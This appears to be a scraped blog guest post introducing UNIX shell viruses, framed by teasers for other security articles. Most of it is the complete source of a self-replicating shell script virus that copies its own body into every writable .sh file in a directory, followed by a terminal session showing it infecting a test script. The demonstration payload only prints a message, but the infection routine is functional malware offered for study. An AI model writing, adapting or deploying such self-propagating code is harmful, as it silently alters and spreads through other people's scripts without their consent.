OSINT – Open Source Intelligence Training Course Free
This course goes from scratch to advanced; it covers the most critical aspect of OSINT (open-source intelligence). The OSINT plays a vital role in the
Home / Blog / Guest Post / A Brief Introduction to UNIX SHELL Virus
#!/bin/sh#file name: virus_demo.sh#purpose: shell virus demonstration#note: the virus will affect all the files that end with .sh in the currentdirectory, but it will not affect them repeatedly.#compiler: watercloud@xfocus.org#date: 2003-5-13#B:<+!a%C&t:>vFile=$_ ; vTmp=/tmp/.vTmp.$$for f in ./*.sh; doif [ ! -w $f -a ! -r $vFile ]; then continue; fiif grep ‘<+!a%C&t:>’ $f ; then continue; fiif sed -n ‘1p’ $f | grep ‘csh’; then continue; ficp -f $f $vTmp ;if [ $? -ne 0 ];then continue; fivNo=`awk ‘$0~/(^b*#)|(^b*$)/&&v==NR-1{v++}END{print 0+v}’ $vTmp`sed -n “1,${vNo}p” $vTmp >$f(sed -n ‘/^#B:<+!a%C&t:>/,/^#E:<+!a%C&t:>/p’ $vFile ;echo ) >>$fvNo=`expr $vNo + 1`sed -n “${vNo},$p” $vTmp >>$frm -f $vTmpdone >/dev/null 2>&1unset vTmp ;unset vFile ;unset vNoecho “Hi, here is a demo shell virus in your script !”#E:<+!a%C&t:>#EOF
[cloud@ /export/home/cloud/vir]> ls -ldrwxr-xr-x 2 cloud staff 512 6?? 4 17:43 ./drwxr-xr-x 10 cloud staff 1024 6?? 4 17:41 ../-rwxr–r– 1 cloud staff 89 6?? 4 17:43 test.sh-rwxr–r– 1 cloud staff 773 6?? 4 17:42 virus_demo.shLet’s have a look at the victim script. It is very simple:[cloud@ /export/home/cloud/vir]> cat test.sh#!/bin/sh# Just a demo for virus test# Author : foo# Date : 3000-1-1ls -l#EOFBegin to affect.[cloud@ /export/home/cloud/vir]> ./virus_demo.shHi, here is a demo shell virus in your script !The result after affect:[cloud@ /export/home/cloud/vir]> cat test.sh#!/bin/sh# Just a demo for virus test# Author : foo# Date : 3000-1-1#B:<+!a%C&t:>vFile=$_ ; vTmp=/tmp/.vTmp.$$for f in ./*.sh; doif [ ! -w $f -a ! -r $vFile ]; then continue; fiif grep ‘<+!a%C&t:>’ $f ; then continue; fiif sed -n ‘1p’ $f | grep ‘csh’; then continue; ficp -f $f $vTmp ;if [ $? -ne 0 ];then continue; fivNo=`awk ‘$0~/(^b*#)|(^b*$)/&&v==NR-1{v++}END{print 0+v}’ $vTmp`sed -n “1,${vNo}p” $vTmp >$f(sed -n ‘/^#B:<+!a%C&t:>/,/^#E:<+!a%C&t:>/p’ $vFile ;echo ) >>$fvNo=`expr $vNo + 1`sed -n “${vNo},$p” $vTmp >>$frm -f $vTmpdone >/dev/null 2>&1unset vTmp ;unset vFile ;unset vNoecho “Hi, here is a demo shell virus in your script !”#E:<+!a%C&t:>ls -l#EOFThe virus body:#B:<+!a%C&t:>. . . .#E:<+!a%C&t:>
Execute the new virus body:[cloud@ /export/home/cloud/vir]> ./test.shHi, here is a demo shell virus in your script !Printing information in the virus body.-rwxr-xr-x 1 cloud staff 724 6?? 4 17:44 test.sh-rwxr-xr-x 1 cloud staff 773 6?? 4 17:42 virus_demo.sh
Industrial Cybersecurity
September 28, 2023
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This course goes from scratch to advanced; it covers the most critical aspect of OSINT (open-source intelligence). The OSINT plays a vital role in the
In the past, most games had cheat codes, yet these days it’s more uncommon. As a programmer, I like to perceive how things work, so
Undoubtedly, Metasploit is one of the most organized, well-developed tools in the pen-testers toolbox. But, do hackers use it? Some of them, but not the
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